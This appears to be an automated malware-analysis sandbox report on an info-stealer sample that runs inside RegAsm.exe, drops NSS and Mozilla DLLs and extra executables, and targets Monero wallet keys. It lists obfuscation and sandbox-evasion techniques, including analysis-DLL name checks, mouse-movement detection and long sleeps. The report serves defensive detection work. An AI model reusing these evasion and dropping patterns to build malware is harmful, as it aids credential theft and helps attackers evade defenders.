Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2640919241.000000002C69B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2881426007.000000002264B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2787844428.00000000228AB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418A9A

PE file contains sections with non-standard names

Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F292 push ecx; ret	3_2_0042F2A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CDFE push esi; retn 0042h	3_2_0042CDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422E8A push esi; ret	3_2_00422E8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DF05 push ecx; ret	3_2_0041DF18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B536 push ecx; ret	3_2_6C54B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_224529DE push edi; retn 0000h	14_2_224529E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22583C51 push es; retf	14_2_22583C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225B4BF0 push ecx; ret	14_2_225B4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225BA45D push esi; ret	14_2_225BA45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225FF456 push ebx; ret	14_2_225FF457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225ED568 push esp; retf	14_2_225ED570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225EDB66 push esp; retf	14_2_225EDB67

Source: file.exe	Static PE information: section name: .text entropy: 7.996029289686649
Source: KECBKKEBKE.exe.3.dr	Static PE information: section name: .text entropy: 7.995413357235682
Source: 66fa2b049020f_ldnf[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995413357235682
Source: EGDGCGCFHI.exe.3.dr	Static PE information: section name: .text entropy: 7.995787945508988
Source: 66fa2afc5abea_vasd[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995787945508988
Source: DBGIJEHIID.exe.3.dr	Static PE information: section name: .text entropy: 7.994247352025327

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userIJEGDBGDBF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DBGIJEHIID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\EGDGCGCFHI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userGIEGHJEGHJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KECBKKEBKE.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\EGDGCGCFHI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DBGIJEHIID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KECBKKEBKE.exe	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418A9A

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EGDGCGCFHI.exe.43d5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2560292223.000000000440E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2762920375.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 0000001B.00000002.2762920375.000000000043A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: 8C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: 4560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: 1930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: 33D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: 1980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: 1140000 memory reserve \| memory write watch
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: 29C0000 memory reserve \| memory write watch
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: 49C0000 memory reserve \| memory write watch
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: BE0000 memory reserve \| memory write watch
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: 2740000 memory reserve \| memory write watch
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: 4740000 memory reserve \| memory write watch
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: 15A0000 memory reserve \| memory write watch
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: 3300000 memory reserve \| memory write watch
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: 1840000 memory reserve \| memory write watch

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userIJEGDBGDBF.exe	Thread delayed: delay time: 922337203685477

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\sql[1].dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 5536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2788	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe TID: 2032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe TID: 5268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 1616	Thread sleep count: 74 > 30
Source: C:\Users\userGIEGHJEGHJ.exe TID: 1864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userIJEGDBGDBF.exe TID: 2820	Thread sleep time: -922337203685477s >= -30000s
